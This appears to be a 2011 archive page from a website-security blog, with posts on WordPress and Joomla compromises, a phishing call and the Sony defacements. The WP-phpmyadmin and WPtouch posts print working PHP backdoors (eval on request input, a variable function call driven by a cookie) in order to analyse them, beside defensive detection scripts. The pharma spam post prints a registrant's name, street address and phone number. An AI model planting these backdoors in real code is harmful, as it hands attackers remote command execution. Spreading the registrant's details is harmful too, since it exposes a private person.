Archives for June 2011

WordPress 3.1.4 available – Time to update

If you are running WordPress, it is time to update it now. WordPress v3.1.4 was just released with security fixes for all the previous versions (especially important if you have users with editor-level permissions).

From the WordPress blog:

WordPress 3.1.4 is available now and is a maintenance and security update for all previous versions.


This release fixes an issue that could allow a malicious Editor-level user to gain further access to the site. Thanks K. Gudinavicius of SEC Consult for bringing this to our attention. Version 3.1.4 also incorporates several other security fixes and hardening measures thanks to the work of WordPress developers Alexander Concha and Jon Cave of our security team. Consult the change log for more details.

List of modified files:

Files wordpress-3.1.3/readme.html and wordpress-3.1.4/readme.html differ
Files wordpress-3.1.3/wp-admin/custom-header.php and wordpress-3.1.4/wp-admin/custom-header.php differ
Files wordpress-3.1.3/wp-admin/includes/deprecated.php and wordpress-3.1.4/wp-admin/includes/deprecated.php differ
Files wordpress-3.1.3/wp-admin/includes/media.php and wordpress-3.1.4/wp-admin/includes/media.php differ
Files wordpress-3.1.3/wp-admin/includes/post.php and wordpress-3.1.4/wp-admin/includes/post.php differ
Files wordpress-3.1.3/wp-admin/includes/update-core.php and wordpress-3.1.4/wp-admin/includes/update-core.php differ
Files wordpress-3.1.3/wp-admin/js/ and wordpress-3.1.4/wp-admin/js/ differ
Files wordpress-3.1.3/wp-admin/js/user-profile.js and wordpress-3.1.4/wp-admin/js/user-profile.js differ
Files wordpress-3.1.3/wp-admin/options-general.php and wordpress-3.1.4/wp-admin/options-general.php differ
Files wordpress-3.1.3/wp-content/themes/twentyten/languages/twentyten.pot and wordpress-3.1.4/wp-content/themes/twentyten/languages/twentyten.pot differ
Files wordpress-3.1.3/wp-includes/bookmark.php and wordpress-3.1.4/wp-includes/bookmark.php differ
Files wordpress-3.1.3/wp-includes/formatting.php and wordpress-3.1.4/wp-includes/formatting.php differ
Files wordpress-3.1.3/wp-includes/post.php and wordpress-3.1.4/wp-includes/post.php differ
Files wordpress-3.1.3/wp-includes/query.php and wordpress-3.1.4/wp-includes/query.php differ
Files wordpress-3.1.3/wp-includes/script-loader.php and wordpress-3.1.4/wp-includes/script-loader.php differ
Files wordpress-3.1.3/wp-includes/taxonomy.php and wordpress-3.1.4/wp-includes/taxonomy.php differ
Files wordpress-3.1.3/wp-includes/version.php and wordpress-3.1.4/wp-includes/version.php differ
Files wordpress-3.1.3/wp-includes/wp-db.php and wordpress-3.1.4/wp-includes/wp-db.php differ
Files wordpress-3.1.3/wp-settings.php and wordpress-3.1.4/wp-settings.php differ

If you are using WordPress, you can also scan it here for security issues and malware:

Phishing phone calls –

It was early morning (around 8am) and I received a phone call from someone asking for me by name (using a private number and with a strong Indian accent):

Caller: Hello, can I speak with XX? (my real name)

Me: Sure, it is me.

Caller: Hello, I am calling from Online Support because there are some serious warnings coming from our Windows Server saying that your computer is compromised.

Me: Wow, it is?

At this point I was aware of what was going on. This group from India has been calling thousands of numbers scaring people that their computer is compromised and convincing them to buy their service or install their software.

WP-phpmyadmin WordPress plugin – Delete it now

If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on.

On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:

<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>

This is not part of the plugin, and should be removed immediately!

The code snippet above is a backdoor and allows remote access to the affected sites with it installed.

We also noticed that it was removed from the WordPress plugin repository (originally here: ) and is no longer maintained (last update in 2007). Since it is no longer being updated, you shouldn’t be using it anymore.

EDIT: We had an opportunity to catch up with Andrew Nacin, a WordPress Core Member who stated:

The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.

So the plugin wasn’t removed because of any security issue, but because of the recent weird activity and due to the fact that it is not maintained, we recommend deleting it as soon as possible.

If you’re seeing anything out of the ordinary, please let us know. If we find anything else, we will update the post.

If you are not sure if your site got hacked, you can scan it here:

WordPress plugins hacked – Understanding the backdoor

If you haven’t heard about it already, yesterday three popular WordPress plugins (AddThis, WPtouch, and W3 Total Cache) had a malicious backdoor added to them via the plugin repository. That led to resetting all passwords as a precaution. You can read about it here: Passwords Reset. I must note that the team did an amazing job dealing with this incident and getting it all fixed very fast!

However, what is interesting to us is what the team said:

Earlier today the WordPress team noticed suspicious commits to several popular plugins (AddThis, WPtouch, and W3 Total Cache) containing cleverly disguised backdoors.

Cleverly disguised backdoors? That’s something we wanted to check. We went to their repositories and found this in the WPtouch changelog:

if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))
    $this->desired_view = $matches[1].$matches[2];

What does this code do

Someone skimming through the code may not see anything malicious there. However, it checks whether a specific cookie is set and, if it is, parses its content into the $matches variable. It then executes code by calling $matches[1]($matches[2]). That is possible because PHP lets a variable that holds a function name be called as a function (so $matches[1] is the function name and $matches[2] is its argument).

So someone could set the cookie to eval, or even system/exec, and run any command on the target site as the web server user.
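A reviewer can look for both backdoor shapes shown in these posts: `eval()` on request input (the WP-phpmyadmin case) and a variable function call on an array filled from request input (the WPtouch case). The scanner below is an added example, not code from the original posts or from WordPress; the function name, finding labels and the benign sample are assumptions made for illustration.

```python
import re

# Shape 1 (WP-phpmyadmin upgrade.php): eval() fed by a request superglobal,
# directly or through wrappers such as stripslashes().
EVAL_ON_INPUT = re.compile(
    r"\beval\s*\(\s*(?:\w+\s*\(\s*)*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I)
# Shape 2 (WPtouch commit): an array element used as the callee,
# e.g. $matches[1]($matches[2]).
VARIABLE_CALL = re.compile(r"(\$\w+)\s*\[[^\]]+\]\s*\(")
# Taint hint: that array is the output argument of a preg_match() whose
# subject is a request superglobal.
TAINT = (r"preg_match(?:_all)?\s*\([^;]*?,\s*"
         r"\$_(?:REQUEST|GET|POST|COOKIE)\b[^,;]*,\s*{var}\b")


def scan_php(source):
    """Return sorted (line, finding) pairs for one PHP source string.

    Regex heuristic, not a PHP parser: hits inside strings or comments are
    reported too, so every finding still needs manual review.
    """
    def line_of(pos):
        return source.count("\n", 0, pos) + 1

    findings = [(line_of(m.start()), "eval-on-request-input")
                for m in EVAL_ON_INPUT.finditer(source)]
    for m in VARIABLE_CALL.finditer(source):
        taint = TAINT.format(var=re.escape(m.group(1)))
        kind = ("variable-call-on-request-input"
                if re.search(taint, source, re.I) else "variable-call")
        findings.append((line_of(m.start()), kind))
    return sorted(findings)


# The first two samples are the snippets quoted on this page; the third is a
# constructed benign dispatch table, reported only at the lower review level.
PHPMYADMIN_SAMPLE = '<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>'
WPTOUCH_SAMPLE = r'''<?php
if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))
    $this->desired_view = $matches[1].$matches[2];
'''
BENIGN_SAMPLE = '<?php $h = array("t" => "trim"); echo $h["t"]($s); ?>'

if __name__ == "__main__":
    for name in ("PHPMYADMIN_SAMPLE", "WPTOUCH_SAMPLE", "BENIGN_SAMPLE"):
        print(name, scan_php(globals()[name]))
```

Run it over each changed file of a plugin update; a plain `variable-call` finding is common in legitimate code and only becomes urgent when the callee can be traced back to request data.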

Kudos to the WordPress Core Team

Again, very clever backdoor and I am impressed that the WordPress team caught this in the middle of so many plugins and commits. I wasn’t able to check the other plugins, because it seems that is down at the moment.

Another thing to highlight, which Matt stated in the news release on, is make sure you update your plugins. By making sure your software is up to date, you have the latest patches and security fixes which in turn lowers your risk of security issues.

If you are worried your site might have been hacked, try scanning it with Sucuri SiteCheck to see if there is anything wrong.

Backup, backup and backup

We just heard of a sad story about an Australian web hosting company (Distribute.IT) that was hacked and all of the sites they hosted were deleted (almost 5 thousand of them). What’s even worse is that the attackers deleted and corrupted their backup archives, so they were not able to recover any of the files.

Yes, it means almost 5 thousand users lost all of their data. Hopefully, some of them had an offsite backup, but most of them didn’t. You can read the whole story here.

This is the important part:

“At this time, We regret to inform that the data, sites and emails that were hosted on Drought, Hurricane, Blizzard and Cyclone can be considered by all the experts to be unrecoverable,”

Wow. Make sure to start backing up your sites right now if you are not doing so. And choose an off site backup location if possible.

Google blacklisted all the domains

It seems that Google just blacklisted all the sites under the main domain (including the, and all others). In their status page Google says:

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, appeared to function as an intermediary for the infection of 13788 site(s) including,,

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 47193 domain(s), including,,

So according to Google, they infected more than 47 thousand domains. It is interesting because in the last few months the .cc TLD has been the most used by attackers, but it seems that Google decided to just blacklist everything (probably by mistake).

You can see this warning, by checking the status page on google for any site ending in :

What is the current listing status for

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2907 time(s) over the past 90 days.

We will post more details if we hear back from Google.

Blackhat SPAM SEO From – Targeting Joomla

We are tracking another Blackhat SEO SPAM network being managed by By the name of the domain, you can guess that they are targeting Joomla sites.

When you visit a compromised site, you don’t see anything wrong, but if you view the source, there is a large block of spammy links hidden in there:

<span style="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px">
<a href="http://www&#46nigeriavillagesquare&#46com/t3-assets/css/index&#46php">ACD
 Systems Canvas 11 with GIS Plus</a><br><a href="http://www&#46nigeriavillagesquar…. hundreds more links…

All those links are generated by (or global.php), which gets called on the Joomla site by the following code added to the template’s index.php:

<?php readfile("");

If you have a Joomla site make sure it is updated. You can check if it has not been compromised with this crud by viewing the source of your site, or scanning it in here: Sucuri SiteCheck. If you see a warning about SEO SPAM on our scanner, you know your site is hacked.
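The "view the source" check described above can be automated by listing every link that sits inside an element hidden with inline CSS. This is an added example, not code from the original post or from Sucuri's scanner; the sample page and its `.example` hosts are constructed, and the `display:none` and off-screen rules go beyond the `visibility: hidden` style quoted on this page.

```python
import re
from html.parser import HTMLParser

# Inline styles that hide content: the visibility trick quoted above, plus
# display:none and large negative offsets (generalizations, not from the page).
HIDING_CSS = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none|"
    r"(?:left|top|text-indent)\s*:\s*-\d{3,}", re.I)
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link"}


class HiddenLinkFinder(HTMLParser):
    """Collect hrefs of <a> tags nested inside elements hidden by inline CSS."""

    def __init__(self):
        super().__init__()
        self.stack = []          # (tag, hides_content) for each open element
        self.hidden_links = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href") and any(h for _, h in self.stack):
            self.hidden_links.append(attrs["href"])
        if tag not in VOID_TAGS:
            hides = bool(HIDING_CSS.search(attrs.get("style") or ""))
            self.stack.append((tag, hides))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag so unclosed elements do not
        # leave a stale "hidden" state on the stack.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break


def find_hidden_links(html):
    """Return hrefs found inside hidden elements (inline styles only)."""
    finder = HiddenLinkFinder()
    finder.feed(html)
    finder.close()
    return finder.hidden_links


# Constructed sample page: two visible links and one hidden spam block.
SAMPLE_PAGE = """<html><body>
<p>Welcome to <a href="http://site.example/about">our site</a></p>
<span style="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px">
<a href="http://spam.example/t3-assets/css/index.php">Cheap software</a><br>
<a href="http://spam.example/t3-assets/css/index.php?p=2">More software</a><br>
</span>
<a href="http://site.example/contact">Contact</a>
</body></html>"""
```

Content hidden through a stylesheet class or by script is not covered, so an empty result does not prove a page is clean.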

What’s interesting is that if you search for on Google, you will get thousands of sites found because of this warning:

“Warning: readfile(” failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or …

Which probably happened when the joomlapoject site was down, causing all those errors.

If your site is hacked or compromised, we can help! Sign up here for any of our plans to get it sorted out:

Information Leakage on multiple WordPress themes by WooThemes

This weekend there was a post on the Full Disclosure list about multiple vulnerabilities in some WordPress themes by WooThemes. This is what the message said:

Vulnerable are the next themes by WooThemes: Live Wire (all three themes from Live Wire series), Gotham News, Typebased, Blogtheme, VibrantCMS, Fresh News, The Gazette Edition, NewsPress, The Station, The Original Premium News, Flash News, Busy Bee, Geometric…


In different themes there is test.php – script with phpinfo() – which leads to Information Leakage (disclosure of FPD and other important information about the server) and XSS (in PHP < 4.4.1, 4.4.3-4.4.6).

So what exactly is going on? Basically, these themes include a “test.php” file that prints the output of phpinfo(), leaking some internal information about the server (internal path, modules, versions, etc). This information leakage by itself is not serious, but can be used by an attacker when trying to hack the site. The other issue (XSS – cross site scripting) is a bug in PHP4 itself and does not affect anyone using PHP5 (which I hope is everybody).

So, if you are using any of those themes, it is a good idea to remove this test.php file, since debugging code shouldn’t be on production sites. If you are running PHP4, you have bigger issues than this XSS/information leakage, and we recommend getting your software up to date!

Running WordPress? Scan your site for free to see if it has any malware or security issues:

Sony Music Brazil hacked (yet another sony defacement)

I hate to pick on Sony, but they got hacked again (and no, I am not talking about the Lulzsec + sonypictures, this is another one). This time it was Sony Music Brazil, which was defaced yesterday night and is STILL defaced after more than 10 hours. That’s a bit too long, even for Sony…

Link of the hack: http://www.sonymusic


What a month for them…

Links Injection on WordPress – Blackhat SEO Spam (basicpills) update

For the last few months we’ve been tracking a very large blackhat SEO spam campaign initiated by, and many other pharma-related domains (mostly located at and

The method used is very simple, where the attackers inject a single spam link on every post of the web site (generally WordPress). These are some of the links you will see in an infected site:

<a href="http://247pharmaceutical. com/">online prescription drugs without  a prescription..

<a href="http://webemed. com/">Buy  Generic  Cialis Onlin.

<a href="http://getrxpills . com/buy/levi tra.html”>lev itra 10 mg..

The really annoying part is that the domain and anchor text change on every post, making it very hard to delete and detect. These are some of the domains being used:

Some of these domains are being registered through Godaddy by:

Administrative Contact:
York, Steve
6041 Pierless Ave
Sugar Hill, GA 30518
United States
7709450281 Fax —

And we would love to get them disabled.

For the site owners out there, you can check if your site has been infected by scanning it with our malware and spam scanner. It will show if these links have been added, and if you have other security issues. If your site has been hacked, we recommend changing your DB passwords immediately, and checking the permissions of your wp-config.php file.

If you need help cleaning up the mess, send us an email, or visit us over at Sucuri.

If you have any questions or comments, please let us know.